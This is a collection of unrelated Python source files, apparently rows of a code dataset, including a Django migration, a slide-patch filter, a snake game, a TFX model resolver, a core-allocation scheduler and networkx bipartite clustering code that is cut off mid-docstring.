                ('name', models.CharField(max_length=512)),
                ('image', models.ImageField(default='spare.png', storage=django.core.files.storage.FileSystemStorage(location='./media/images/spares'), upload_to='')),
                ('in_stock', models.IntegerField()),
                ('comment', models.CharField(max_length=512)),
                ('contractors', models.ManyToManyField(to='devices.Contractor')),
                ('indexes', models.ManyToManyField(to='printer_spares.Index')),
                ('printers', models.ManyToManyField(to='printers.Printer')),
                ('urls', models.ManyToManyField(to='devices.Url')),
            ],
        ),
    ]
|
8,049 | 0ad71f02e37f2744036b134c33e037a724fd38a6 | import numpy as np
import matplotlib.pyplot as plt
from PIL import Image
import cv2
import openslide
class QualityPatch():
    """Filter candidate patches of a whole-slide image by how much labeled
    tissue they cover, using a low-resolution binary label image."""

    def __init__(self, original_img_path, label_img_path, patch_level, patch_size):
        """
        parameter:
            original_img_path(str): path of the source whole-slide image
            label_img_path(str): path of the binary tissue-label image
            patch_level(int): pyramid level the patches belong to
            patch_size(tuple): size of a patch (x, y)
        attributes:
            self.slide(OpenSlide): the slide the patches belong to
            self.original_img_path(str): path of the slide
            self.label_img_path(str): label_img_path
            self.patch_level(int): the level that the patch belongs to
            self.patch_size(tuple): size of a patch (x, y)
            self.scale(tuple): per-axis ratio label size / level dimensions
            self.label(np array): label image, transposed to (x, y) indexing
            self.label_size(tuple): the size of the label
            self.adj_patch_size_label(tuple): patch footprint in label
                pixels; +1 so the region is never zero-sized
        """
        self.slide = openslide.OpenSlide(original_img_path)
        slide_width, slide_height = self.slide.dimensions
        # Grayscale label comes in as 0/255; scale down to 0/1 fractions.
        self.label = (cv2.imread(label_img_path, cv2.IMREAD_GRAYSCALE)/255)
        # Candidate patch origins over the level-0 grid, stepped by patch_size.
        self.patch_coors = [(w, h) for w in range(0, slide_width - patch_size[0], patch_size[0]) for h in range(0, slide_height - patch_size[1], patch_size[1])]
        self.original_img_path = original_img_path
        self.label_img_path = label_img_path
        self.patch_level = patch_level
        self.patch_size = patch_size
        # Transpose so the label is indexed (x, y) like slide coordinates.
        self.label = self.label.T
        self.level_dim = self.slide.level_dimensions[patch_level]
        self.label_size = self.label.shape
        self.scale = (self.label_size[0]/self.level_dim[0], self.label_size[1]/self.level_dim[1])
        self.adj_patch_size_label = self.calculateAdjPatchSize()

    def calculateLabelCoordinates(self, patch_location):
        # Map a level-0 patch origin into label pixels: down to patch_level
        # (divide by 2**level), then by the label/level scale.
        return (int(self.scale[0]*patch_location[0]/2**(self.patch_level)), int(self.scale[1]*patch_location[1]/2**(self.patch_level)))

    def calculateAdjPatchSize(self):
        # Patch footprint in label pixels; +1 guards against a zero size.
        return (int(self.scale[0] * self.patch_size[0])+1, int(self.scale[1] * self.patch_size[1])+1)

    def patchQualityInsurance(self, patch_location):
        """Return the fraction of label pixels under the patch that are tissue."""
        label_coordinates = self.calculateLabelCoordinates(patch_location)
        percent = (np.sum(self.label[label_coordinates[0]:label_coordinates[0]+self.adj_patch_size_label[0], label_coordinates[1]:label_coordinates[1]+self.adj_patch_size_label[1]]))/(self.adj_patch_size_label[0]*self.adj_patch_size_label[1])
        return percent

    def getLabelWithPatchLocation(self, patch_location):
        """Return a copy of the label with the patch region painted gray (0.5)."""
        patch_image = np.ones(self.adj_patch_size_label)/2
        label_with_patch_location = self.label.copy()
        label_coordinates = self.calculateLabelCoordinates(patch_location)
        label_with_patch_location[label_coordinates[0]:label_coordinates[0]+self.adj_patch_size_label[0], label_coordinates[1]:label_coordinates[1]+self.adj_patch_size_label[1]] = patch_image
        return label_with_patch_location.T

    def getReleventPatches(self):
        """Return [coordinate, tissue_fraction] pairs for patches over 50% tissue."""
        relevent_patches = []
        for i, coor in enumerate(self.patch_coors):
            percent = self.patchQualityInsurance(coor)
            if percent > .5:
                relevent_patches.append([coor, percent])
            # Progress report every 10k candidates.
            if i % 10000 == 0:
                print(i, "/", len(self.patch_coors), "dic len", len(relevent_patches), " from", len(self.patch_coors))
        return relevent_patches

    def checkingfunction(self, checking_coors=(40000, 90000)):
        """Visual sanity check: save patch / label / patch-on-label figures."""
        # BUG FIX: the second bound previously re-tested index 0
        # (`checking_coors[0] < 0 or checking_coors[0] < 0`), so a negative
        # y-coordinate was never rejected; it now checks index 1.
        if checking_coors[0] < 0 or checking_coors[1] < 0 or\
                self.slide.level_dimensions[self.patch_level][0] < (checking_coors[0] / 2**(self.patch_level) + self.patch_size[0]) or\
                self.slide.level_dimensions[self.patch_level][1] < ((checking_coors[1] / 2**(self.patch_level) + self.patch_size[1])):
            raise ValueError("the patch location with patch size is not valid.")
        image = self.slide.read_region(checking_coors, self.patch_level, self.patch_size)
        percent = self.patchQualityInsurance(checking_coors)
        fig, ax = plt.subplots(nrows=1, ncols=3)
        plt.tight_layout()
        ax[0].set_title("tissue percentage %.02f"%percent)
        ax[0].axis('off')
        ax[0].imshow(image)
        ax[1].set_title("tissue label")
        ax[1].axis('off')
        ax[1].imshow(self.label.T, cmap='gray')
        ax[2].set_title("label with patch")
        ax[2].axis('off')
        ax[2].imshow(self.getLabelWithPatchLocation(checking_coors))
        plt.savefig("test/check_read_region"+str(self.patch_level)+'.png')
        plt.close('all')
|
8,050 | d520f9d681125937fbd9dff316bdc5f922f25ff3 | """Seed file to make sample data for pets db."""
from models import db, User, Feedback
from app import app
# Create all tables
# Drop-and-recreate gives a clean schema every time the seed runs.
db.drop_all()
db.create_all()
# If table isn't empty, empty it
User.query.delete()
Feedback.query.delete()
# Add users and posts
# NOTE(review): plaintext throwaway credentials — dev/test seeding only.
john = User(username="John",password="123",email="24",first_name="12a",last_name="123")
# Add new objects to session, so they'll persist
db.session.add(john)
#have to add users first to not violate foreign key constraints
db.session.commit()
# Feedback.username is a foreign key to the user committed above.
feed = Feedback(title="test",content="alsdkjf",username="John")
db.session.add(feed)
# Commit--otherwise, this never gets saved!
db.session.commit()
|
8,051 | 83815acb0520c1f8186b0b5c69f8597b1b6a552a | #! /usr/bin/env python
from game_calc import *
def game(screen, clock):
    """Run the snake game loop on `screen` until the player dies or quits.

    Relies on helpers from game_calc (new_food, check_ahead); returns the
    final score when check_ahead reports 'GAME_OVER'.
    """
    running = True
    time = 0  # NOTE(review): never used after initialization
    WHITE = (255,255,255)
    BLUE = (0,0,205)
    # Playing-field walls.
    upper_border = pygame.Rect(12,44,1000,20)
    right_border = pygame.Rect(992,60,20,648)
    left_border = pygame.Rect(12,60,20,648)
    down_border = pygame.Rect(12,694,1000,20)
    # Snake starts as five vertically stacked 10x10 segments, head first.
    snake = [(512,344),(512,354),(512,364),(512,374),(512,384)]
    direction = 'UP'
    bonus_timer = 0
    food = new_food(screen, snake)
    bonus = None
    eaten = True
    eaten_cooldown = 1  # frames of growth remaining after eating
    x_change = 0
    y_change = 0
    score = 0
    font = pygame.font.Font(os.path.join('font.ttf'), 28)
    countdown_font = pygame.font.Font(os.path.join('font.ttf'), 100)
    # *_pressed flags block a perpendicular turn while a key is held.
    up_pressed = False
    right_pressed = False
    down_pressed = False
    left_pressed = False
    countdown = True
    while running:
        for event in pygame.event.get():
            if event.type == pygame.QUIT:
                running = False
            elif event.type == pygame.KEYDOWN:
                if event.key == pygame.K_ESCAPE:
                    running = False
                # A turn is accepted only if it is not a 180-degree reversal
                # and no perpendicular key is currently held down.
                if event.key == pygame.K_UP and not direction == 'DOWN' and not right_pressed and not left_pressed:
                    direction = 'UP'
                    up_pressed = True
                elif event.key == pygame.K_DOWN and not direction == 'UP' and not right_pressed and not left_pressed:
                    direction = 'DOWN'
                    down_pressed = True
                elif event.key == pygame.K_RIGHT and not direction == 'LEFT' and not up_pressed and not down_pressed:
                    direction = 'RIGHT'
                    right_pressed = True
                elif event.key == pygame.K_LEFT and not direction == 'RIGHT' and not up_pressed and not down_pressed:
                    direction = 'LEFT'
                    left_pressed = True
            elif event.type == pygame.KEYUP:
                # Per-key branches are intentionally no-ops; any release
                # clears all pressed flags below.
                if event.key == pygame.K_DOWN:
                    None
                elif event.key == pygame.K_UP:
                    None
                elif event.key == pygame.K_RIGHT:
                    None
                elif event.key == pygame.K_LEFT:
                    None
                up_pressed = False
                right_pressed = False
                down_pressed = False
                left_pressed = False
        # Translate the current direction into a 10px step for this frame.
        if direction == 'RIGHT':
            x_change = 10
            y_change = 0
        elif direction == 'LEFT':
            x_change = -10
            y_change = 0
        elif direction == 'UP':
            x_change = 0
            y_change = -10
        elif direction == 'DOWN':
            x_change = 0
            y_change = 10
        # Ask the game logic what occupies the next cell.
        status = check_ahead(screen, snake[0][0]+x_change, snake[0][1]+y_change)
        if status == 'NOTHING' or status == 'EAT':
            snake.insert(0,(snake[0][0]+x_change,snake[0][1]+y_change))
        if status == 'EAT':
            eaten = True
            eaten_cooldown = eaten_cooldown + 4  # grow for 4 extra frames
            food = new_food(screen, None)
            score += 1
            # 1-in-8 chance to spawn a timed bonus when none is active.
            if random.randint(1,8) == 8 and not bonus:
                bonus = new_food(screen, [food])
                bonus_timer = 5
        if status == 'BONUS':
            bonus = None
            score += 6
            eaten_cooldown += 8
        # Pop the tail unless the snake is still growing.
        if not eaten and eaten_cooldown == 0:
            snake = snake[0:-1]
        else:
            eaten = False
            eaten_cooldown = eaten_cooldown - 1
        if status == 'GAME_OVER':
            return score
        # Tick the bonus down in real time and expire it at zero.
        if bonus_timer:
            bonus_timer = bonus_timer - (clock.get_time() / 1000)
            if bonus_timer <= 0:
                bonus = None
                bonus_timer = 0
        # --- drawing ---
        screen.fill((0,0,0))
        pygame.draw.rect(screen,BLUE,upper_border)
        pygame.draw.rect(screen,BLUE,right_border)
        pygame.draw.rect(screen,BLUE,left_border)
        pygame.draw.rect(screen,BLUE,down_border)
        pygame.draw.rect(screen,(35,142,35),pygame.Rect(food[0],food[1],10,10))
        if bonus:
            pygame.draw.rect(screen,(255,215,0),pygame.Rect(bonus[0],bonus[1],10,10))
            screen.blit(font.render(str(round(bonus_timer,1)),False,(255,255,0)), (200,8))
        screen.blit(font.render("Score: " + str(score),False,(255,255,0)), (900,8))
        for dot in snake:
            pygame.draw.rect(screen,WHITE,pygame.Rect(dot[0],dot[1],10,10))
        pygame.display.update()
        # One-time 3-2-1 countdown overlay drawn on the first frame.
        if countdown:
            update_rect = pygame.Rect(500,350,100,100)
            countdown = False
            for i in range(3,0,-1):
                pygame.draw.rect(screen,(0,0,0),update_rect)
                screen.blit(countdown_font.render(str(i),False,BLUE), (500,350))
                pygame.display.update(update_rect)
                pygame.time.delay(1000)
        #print(clock.get_fps())
        clock.tick(25)  # cap the loop at 25 FPS
8,052 | 346df9706dc222f43a77928964cd54e7d999a585 | import discord
class Leveling:
    """Per-guild leveling configuration backed by the config.leveling table."""

    __slots__ = (
        'sid', 'channelID', 'message', 'noxpchannelIDs', 'noxproleID', 'remove', 'bot', 'roles')

    sid: int                   # guild (server) id
    channelID: int             # channel for level-up messages
    message: str               # level-up message template
    noxpchannelIDs: list[int]  # channels excluded from XP
    noxproleID: int            # role excluded from XP
    remove: bool               # 'remove' flag from the DB row — presumably
                               # removes previous level roles; verify usage
    roles: list[list]          # level/role data awarded on level-up

    def __init__(self, bot, sid, record):
        self.sid = sid
        self.bot = bot
        if record is None:
            # No stored config for this guild yet: empty/None defaults.
            self.roles = []
            self.noxpchannelIDs = []
            self.remove = None
            self.channelID = None
            self.message = None
            self.noxproleID = None
        else:
            self.remove = record.get('remove')
            self.message = record.get('message')
            self.channelID = record.get('channel')
            self.noxproleID = record.get('noxprole')
            self.noxpchannelIDs = record.get('noxpchannels') or []
            self.roles = record.get('roles') or []

    @property
    def channel(self) -> discord.TextChannel:
        # Resolve the announcement channel; evaluates to None/falsy when the
        # guild or channel is not in the bot's cache.
        guild = self.bot.get_guild(self.sid)
        return guild and guild.get_channel(self.channelID)

    async def reload(self):
        # Re-fetch this guild's row and overwrite the cached settings.
        # NOTE(review): assumes the row exists — record is indexed without a
        # None check, unlike __init__.
        record = await self.bot.db.fetchrow('SELECT * FROM config.leveling WHERE sid = $1',
                                            self.sid)
        self.remove = record['remove']
        self.message = record['message']
        self.channelID = record['channel']
        self.noxproleID = record['noxprole']
        self.roles = record['roles'] or []
        self.noxpchannelIDs = record['noxpchannels'] or []
|
8,053 | 14807568af046594644095a2682e0eba4f445b26 | # Write a function that receives a string as a parameter and returns a dictionary in which the keys are the characters in the character string and the values are the number of occurrences of that character in the given text.
# Example: For string "Ana has apples." given as a parameter the function will return the dictionary: {'A': 1, '': 2, 'n': 1, 'a': 2, 'r': 2, '.': 1}.
# varianta 1
string=input("Input your string: ")
def funct(string):
    """Return a dict mapping each character of `string` to its number of
    occurrences (spaces and punctuation included)."""
    # `counts` replaces a local previously named `dict`, which shadowed the
    # builtin; dict.get folds the membership test and update into one line.
    counts = {}
    for ch in string:
        counts[ch] = counts.get(ch, 0) + 1
    return counts
print(funct(string))
# varianta 2
from collections import Counter
def counter():
    """Prompt the user for a string and return a Counter of its characters."""
    text = input("Input your string :")
    tally = Counter(text)
    return tally
print(counter()) |
8,054 | 2fabb03f0f6b0b297245354782e650380509424b | y = 10
x = 'Тишь да гладь'
# Demo of f-string interpolation with a module-level string and number
# (labels and prompts are intentionally left in Russian).
print(f'Текст:{x}')
print(f'Число:{y}')
# input() always returns str; the "numbers" are never converted to int.
a1 = input('Введите первое число: ')
a2 = input('Введите второе число: ')
b1 = input('Введите первую строку: ')
b2 = input('Введите вторую строку: ')
print(f'Вы ввели числа: {a1}/{a2}')
print(f'Вы ввели строки: {b1} / {b2}')
|
8,055 | d67842c05af9241dbe7e038a9b2dc4223ee7ef4d | # You have an array arr of length n where arr[i] = (2 * i) + 1 for all valid values of i (i.e. 0 <= i < n).
# In one operation, you can select two indices x and y where 0 <= x, y < n and subtract 1 from arr[x] and add 1 to arr[y]
# (i.e. perform arr[x] -=1 and arr[y] += 1). The goal is to make all the elements of the array equal.
# It is guaranteed that all the elements of the array can be made equal using some operations.
# Given an integer n, the length of the array. Return the minimum number of operations needed to make all the elements of arr equal.
def minOps(n):
    """Return the minimum number of operations to equalize the array
    arr[i] = 2*i + 1 (each operation moves one unit between two elements).

    Closed form replaces the original O(n) summation loops:
      odd n:  2*(1 + 2 + ... + n//2) = k*(k+1),  k = n//2
      even n: 1 + 3 + ... + (n-1)    = (n//2)**2
    Both equal n*n // 4.
    """
    if n <= 1:
        # Arrays of length 0 or 1 are already equal.
        return 0
    return n * n // 4
def summationMin(n):
    """Closed form for the minimum number of moves: floor(n**2 / 4)."""
    half, odd = divmod(n, 2)
    # n*n // 4 == half*half + half*odd (split by parity).
    return half * half + half * odd
# Demo: print the closed-form minimum-operation counts for n = 0..9.
for i in range(10):
    print(summationMin(i))
|
8,056 | a91d42764fa14111afca4551edd6c889903ed9bd | # Generated by Django 2.1.3 on 2019-01-06 06:53
import django.db.models.deletion
from django.conf import settings
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated initial migration: creates the Session model, which
    # ties an opaque token to a user (FK to the swappable auth user model).

    initial = True

    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
    ]

    operations = [
        migrations.CreateModel(
            name="Session",
            fields=[
                (
                    "id",
                    models.AutoField(
                        auto_created=True,
                        primary_key=True,
                        serialize=False,
                        verbose_name="ID",
                    ),
                ),
                # Immutable, unique session token.
                ("token", models.CharField(editable=False, max_length=64, unique=True)),
                ("description", models.CharField(blank=True, max_length=512)),
                ("created_at", models.DateTimeField(auto_now_add=True)),
                (
                    "last_seen_at",
                    models.DateTimeField(blank=True, editable=False, null=True),
                ),
                (
                    "user",
                    models.ForeignKey(
                        on_delete=django.db.models.deletion.CASCADE,
                        to=settings.AUTH_USER_MODEL,
                    ),
                ),
            ],
        ),
    ]
|
num = 15850
base = 16


def to_base(value, base, width=4):
    """Return `value` rendered in `base` (2-16) as exactly `width` digits.

    Mirrors the original four copy-pasted divide-and-replace steps: the
    number is divided `width` times, so anything beyond `width` digits is
    truncated, and small numbers are left-padded with zeros.
    """
    digits = "0123456789abcdef"
    out = []
    for _ in range(width):
        out.append(digits[value % base])
        value //= base
    out.reverse()
    return "".join(out)


# Same output as the original script: "15850 = 3dea".
print("{} = {}".format(num, to_base(num, base)))
8,058 | 30df17d636c33d2824aad7d7ef6aae7db83615ec | # Copyright 2021 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Experimental Resolver for getting the latest artifact."""
from typing import Dict, List, Optional
from tfx import types
from tfx.dsl.components.common import resolver
from tfx.types import standard_artifacts
from tfx.utils import doc_controls
import ml_metadata as mlmd
try:
from tfx.components.evaluator import constants as eval_consts # pylint: disable=g-import-not-at-top
_CURRENT_MODEL_ID = eval_consts.ARTIFACT_PROPERTY_CURRENT_MODEL_ID_KEY
_BLESSED = eval_consts.ARTIFACT_PROPERTY_BLESSED_KEY
except ImportError:
# ml-pipelines-sdk package doesn't have tfx.components.
_CURRENT_MODEL_ID = 'current_model_id'
_BLESSED = 'blessed'
class LatestBlessedModelStrategy(resolver.ResolverStrategy):
  """LatestBlessedModelStrategy resolves the latest blessed Model artifact.

  Note that this ResolverStrategy is experimental and is subject to change in
  terms of both interface and implementation.

  Don't construct LatestBlessedModelStrategy directly, example usage:
  ```
  model_resolver = Resolver(
      strategy_class=LatestBlessedModelStrategy,
      model=Channel(type=Model),
      model_blessing=Channel(type=ModelBlessing),
  ).with_id('latest_blessed_model_resolver')
  model_resolver.outputs['model']
  ```
  """

  def _resolve(self, input_dict: Dict[str, List[types.Artifact]],
               model_channel_key: str, model_blessing_channel_key: str):
    # Sort models newest-first by artifact id so the first blessed match
    # below is the latest one.
    all_models = input_dict[model_channel_key]
    all_models.sort(key=lambda a: a.id, reverse=True)
    all_model_blessings = input_dict[model_blessing_channel_key]
    # Makes a dict of {model_id : ModelBlessing artifact} for blessed models.
    all_blessed_model_ids = {
        a.get_int_custom_property(_CURRENT_MODEL_ID): a
        for a in all_model_blessings
        if a.get_int_custom_property(_BLESSED) == 1}
    # Default result: both channels empty when no blessed model is found.
    result = {model_channel_key: [], model_blessing_channel_key: []}
    # Iterates all models, if blessed, set as result. As the model list was
    # sorted, it is guaranteed to get the latest blessed model.
    for model in all_models:
      if model.id in all_blessed_model_ids:
        result[model_channel_key] = [model]
        model_blessing = all_blessed_model_ids[model.id]
        result[model_blessing_channel_key] = [model_blessing]
        break
    return result

  @doc_controls.do_not_generate_docs
  def resolve_artifacts(
      self, store: mlmd.MetadataStore,
      input_dict: Dict[str, List[types.Artifact]]
  ) -> Optional[Dict[str, List[types.Artifact]]]:
    """Resolves artifacts from channels by querying MLMD.

    Args:
      store: An MLMD MetadataStore object.
      input_dict: The input_dict to resolve from.

    Returns:
      The latest blessed Model and its corresponding ModelBlessing, respectively
      in the same input channel they were contained to.

    Raises:
      RuntimeError: if input_dict contains unsupported artifact types.
    """
    # Discover which channel carries Models and which carries ModelBlessings
    # by inspecting the first artifact of each.
    model_channel_key = None
    model_blessing_channel_key = None
    assert len(input_dict) == 2, 'Expecting 2 input Channels'
    for k, artifact_list in input_dict.items():
      if not artifact_list:
        # If model or model blessing channel has no artifacts, the min_count
        # can not be met, short cut to return empty dict here.
        return {key: [] for key in input_dict}
      artifact = artifact_list[0]
      if issubclass(type(artifact), standard_artifacts.Model):
        model_channel_key = k
      elif issubclass(type(artifact), standard_artifacts.ModelBlessing):
        model_blessing_channel_key = k
      else:
        raise RuntimeError('Only expecting Model or ModelBlessing, got %s' %
                           artifact.TYPE_NAME)
    assert model_channel_key is not None, 'Expecting Model as input'
    assert model_blessing_channel_key is not None, ('Expecting ModelBlessing as'
                                                    ' input')
    result = self._resolve(input_dict, model_channel_key,
                           model_blessing_channel_key)
    return result
|
8,059 | aace7bc6684f4a9cec2f8fe270b5123a375780af | from string import maketrans
def to_rna(str):
    """Transcribe a DNA strand to RNA via the complement map
    A->U, C->G, G->C, T->A; any other character passes through unchanged."""
    table = maketrans('ACGT', 'UGCA')
    return str.translate(table)
|
8,060 | 753e062940e0580d7d33c88c1165977142dcd202 | #!/usr/bin/env python3
def main():
    """Read three space-separated integers from stdin and print the
    Blackjack-style verdict: 'bust' when they total 22 or more, else 'win'."""
    a, b, c = map(int, input().split())
    verdict = 'bust' if a + b + c >= 22 else 'win'
    print(verdict)
if __name__ == "__main__":
main()
|
8,061 | 23a7aa6b9a98bfd4fd43fea1ecfa26cb44969804 | from qcg.appscheduler.errors import *
class Node:
    """A single compute node with a fixed pool of cores.

    Tracks how many cores are in use and, when attached to a Resources
    aggregate via `self.resources`, mirrors every allocation/release into
    the aggregate's counters.
    """

    def __init__(self, name=None, totalCores=0, used=0):
        self.__name = name
        self.__totalCores = totalCores
        self.__usedCores = used
        # Back-reference set by Resources so allocate()/release() update
        # the aggregate statistics.
        self.resources = None

    def __getName(self):
        return self.__name

    def __getTotalCores(self):
        return self.__totalCores

    def __setTotalCores(self, total):
        # Total can shrink only down to the number of cores already in use.
        assert total >= 0 and total >= self.__usedCores
        self.__totalCores = total

    def __getUsedCores(self):
        return self.__usedCores

    def __setUsedCores(self, used):
        # BUG FIX: was `used > 0`, which rejected resetting a node to fully
        # free even though the constructor and release() both allow a used
        # count of zero.
        assert used >= 0 and used <= self.__totalCores
        self.__usedCores = used

    def __getFreeCores(self):
        return self.__totalCores - self.__usedCores

    def __str__(self):
        return "%s %d (%d used)" % (self.__name, self.__totalCores, self.__usedCores)

    def allocate(self, cores):
        """
        Allocate maximum number of cores on a node.

        Args:
            cores (int): maximum number of cores to allocate

        Returns:
            int: number of allocated cores (may be fewer than requested)
        """
        allocated = min(cores, self.free)
        self.__usedCores += allocated
        if self.resources is not None:
            self.resources.nodeCoresAllocated(allocated)
        return allocated

    def release(self, cores):
        """
        Release specified number of cores on a node.

        Args:
            cores (int): number of cores to release

        Raises:
            InvalidResourceSpec: when number of cores to release exceeds
                number of used cores.
        """
        if cores > self.__usedCores:
            raise InvalidResourceSpec()
        self.__usedCores -= cores
        if self.resources is not None:
            self.resources.nodeCoresReleased(cores)

    name = property(__getName, None, None, "name of the node")
    total = property(__getTotalCores, __setTotalCores, None, "total number of cores")
    used = property(__getUsedCores, __setUsedCores, None, "number of allocated cores")
    free = property(__getFreeCores, None, None, "number of available cores")
class Resources:
    """Aggregate view over a set of Node objects, tracking total and used
    core counts as the nodes allocate and release cores."""

    def __init__(self, nodes=None):
        self.__nodes = nodes
        if self.__nodes is None:
            self.__nodes = []
        # Register ourselves on every node so its allocate()/release()
        # calls feed the aggregate counters via nodeCoresAllocated/Released.
        for node in self.__nodes:
            node.resources = self
        self.__totalCores = 0
        self.__usedCores = 0
        # print "initializing %d nodes" % len(nodes)
        self.__computeCores()

    def __computeCores(self):
        # Rebuild both aggregate counters from the node list.
        total, used = 0, 0
        for node in self.__nodes:
            total += node.total
            used += node.used
        self.__totalCores = total
        self.__usedCores = used

    def __getNodes(self):
        return self.__nodes

    def __getTotalCores(self):
        return self.__totalCores

    def __getUsedCores(self):
        return self.__usedCores

    def __getFreeCores(self):
        return self.__totalCores - self.__usedCores

    """
    Function called by the node when some cores has been allocated.
    This function should track number of used cores in Resources statistics.

    Args:
        cores (int): number of allocated cores
    """
    def nodeCoresAllocated(self, cores):
        self.__usedCores += cores

    """
    Function called by the node when some cores has been released.
    This function should track number of used cores in Resources statistics.

    Args:
        cores (int): number of released cores
    """
    def nodeCoresReleased(self, cores):
        self.__usedCores -= cores

    """
    Relase allocated resources.

    Args:
        alloc (Allocation): allocation to release

    Raises:
        InvalidResourceSpec: when number of cores to release on a node is greater
          than number of of used cores.
    """
    def releaseAllocation(self, alloc):
        # Delegates to each node; the node mirrors the change back here.
        for node in alloc.nodeAllocations:
            node.node.release(node.cores)

    def __str__(self):
        header = '%d (%d used) cores on %d nodes\n' % (self.__totalCores, self.__usedCores, \
            len(self.__nodes))
        return header + '\n'.join([str(node) for node in self.__nodes])
        # if self.__nodes:
        #     for node in self.__nodes:
        #         result.join("\n%s" % node)
        #     return result

    def nNodes(self):
        return len(self.__nodes)

    nodes = property(__getNodes, None, None, "list of a nodes")
    totalNodes = property(nNodes, None, None, "total number of nodes")
    totalCores = property(__getTotalCores, None, None, "total number of cores")
    usedCores = property(__getUsedCores, None, None, "used number of cores")
    freeCores = property(__getFreeCores, None, None, "free number of cores")
|
8,062 | bca0baaffefed6917939614defadf9960ffa4727 | class Solution:
# @param num, a list of integer
# @return an integer
def rob(self, num):
n = len(num)
if n == 0:
return 0
if(n == 1):
return num[0]
f = [0] * n
f[0] = num[0]
f[1] = max(num[0],num[1])
for i in xrange(2,n):
f[i] = max(f[i-1],f[i-2] + num[i])
return f[n-1] |
8,063 | a21c132ba9f24ff2c695bf66cae074705025d6b1 | #-*- coding: utf-8 -*-
# Copyright (C) 2011 by
# Jordi Torrents <jtorrents@milnou.net>
# Aric Hagberg <hagberg@lanl.gov>
# All rights reserved.
# BSD license.
import itertools
import networkx as nx
__author__ = """\n""".join(['Jordi Torrents <jtorrents@milnou.net>',
'Aric Hagberg (hagberg@lanl.gov)'])
__all__ = ['clustering',
'average_clustering',
'latapy_clustering',
'robins_alexander_clustering']
# functions for computing clustering of pairs
def cc_dot(nu, nv):
    # Jaccard-style pairwise coefficient: |intersection| / |union|.
    shared = nu & nv
    combined = nu | nv
    return len(shared) / float(len(combined))
def cc_max(nu, nv):
    # Overlap normalized by the larger neighbourhood.
    bigger = max(len(nu), len(nv))
    return float(len(nu & nv)) / bigger
def cc_min(nu, nv):
    # Overlap normalized by the smaller neighbourhood.
    smaller = min(len(nu), len(nv))
    overlap = len(nu & nv)
    return float(overlap) / smaller
# Dispatch table mapping the `mode` argument of latapy_clustering to the
# pairwise coefficient implementation.
modes = {'dot': cc_dot,
         'min': cc_min,
         'max': cc_max}
def latapy_clustering(G, nodes=None, mode='dot'):
    r"""Compute a bipartite clustering coefficient for nodes.

    The bipartie clustering coefficient is a measure of local density
    of connections defined as [1]_:

    .. math::

       c_u = \frac{\sum_{v \in N(N(u))} c_{uv} }{|N(N(u))|}

    where `N(N(u))` are the second order neighbors of `u` in `G` excluding `u`,
    and `c_{uv}` is the pairwise clustering coefficient between nodes
    `u` and `v`.

    The mode selects the function for `c_{uv}` which can be:

    `dot`:

    .. math::

       c_{uv}=\frac{|N(u)\cap N(v)|}{|N(u) \cup N(v)|}

    `min`:

    .. math::

       c_{uv}=\frac{|N(u)\cap N(v)|}{min(|N(u)|,|N(v)|)}

    `max`:

    .. math::

       c_{uv}=\frac{|N(u)\cap N(v)|}{max(|N(u)|,|N(v)|)}

    Parameters
    ----------
    G : graph
        A bipartite graph

    nodes : list or iterable (optional)
        Compute bipartite clustering for these nodes. The default
        is all nodes in G.

    mode : string
        The pariwise bipartite clustering method to be used in the computation.
        It must be "dot", "max", or "min".

    Returns
    -------
    clustering : dictionary
        A dictionary keyed by node with the clustering coefficient value.

    Examples
    --------
    >>> from networkx.algorithms import bipartite
    >>> G = nx.path_graph(4) # path graphs are bipartite
    >>> c = bipartite.clustering(G)
    >>> c[0]
    0.5
    >>> c = bipartite.clustering(G,mode='min')
    >>> c[0]
    1.0

    See Also
    --------
    robins_alexander_clustering
    square_clustering
    average_clustering

    References
    ----------
    .. [1] Latapy, Matthieu, Clémence Magnien, and Nathalie Del Vecchio (2008).
       Basic notions for the analysis of large two-mode networks.
       Social Networks 30(1), 31--48.
    """
    if not nx.algorithms.bipartite.is_bipartite(G):
        raise nx.NetworkXError("Graph is not bipartite")

    try:
        cc_func = modes[mode]
    except KeyError:
        raise nx.NetworkXError(
            "Mode for bipartite clustering must be: dot, min or max")

    if nodes is None:
        nodes = G

    ccs = {}
    for v in nodes:
        cc = 0.0
        # Second-order neighbourhood of v, excluding v itself.
        nbrs2 = set([u for nbr in G[v] for u in G[nbr]]) - set([v])
        for u in nbrs2:
            cc += cc_func(set(G[u]), set(G[v]))
        if cc > 0.0:  # len(nbrs2)>0
            # Average the pairwise coefficients over the second-order neighbours.
            cc /= len(nbrs2)
        ccs[v] = cc
    return ccs
# Public alias: ``bipartite.clustering`` uses Latapy's method by default.
clustering = latapy_clustering
def average_clustering(G, nodes=None, mode='dot'):
    r"""Compute the average bipartite clustering coefficient.

    A clustering coefficient for the whole graph is the average,

    .. math::

       C = \frac{1}{n}\sum_{v \in G} c_v,

    where `n` is the number of nodes in `G`.

    Similar measures for the two bipartite sets can be defined [1]_

    .. math::

       C_X = \frac{1}{|X|}\sum_{v \in X} c_v,

    where `X` is a bipartite set of `G`.

    Parameters
    ----------
    G : graph
        a bipartite graph

    nodes : list or iterable, optional
        A container of nodes to use in computing the average.
        The nodes should be either the entire graph (the default) or one of the
        bipartite sets.

    mode : string
        The pariwise bipartite clustering method.
        It must be "dot", "max", or "min"

    Returns
    -------
    clustering : float
        The average bipartite clustering for the given set of nodes or the
        entire graph if no nodes are specified.

    Examples
    --------
    >>> from networkx.algorithms import bipartite
    >>> G=nx.star_graph(3) # star graphs are bipartite
    >>> bipartite.average_clustering(G)
    0.75
    >>> X,Y=bipartite.sets(G)
    >>> bipartite.average_clustering(G,X)
    0.0
    >>> bipartite.average_clustering(G,Y)
    1.0

    See Also
    --------
    clustering

    Notes
    -----
    The container of nodes passed to this function must contain all of the nodes
    in one of the bipartite sets ("top" or "bottom") in order to compute
    the correct average bipartite clustering coefficients.
    See :mod:`bipartite documentation <networkx.algorithms.bipartite>`
    for further details on how bipartite graphs are handled in NetworkX.

    References
    ----------
    .. [1] Latapy, Matthieu, Clémence Magnien, and Nathalie Del Vecchio (2008).
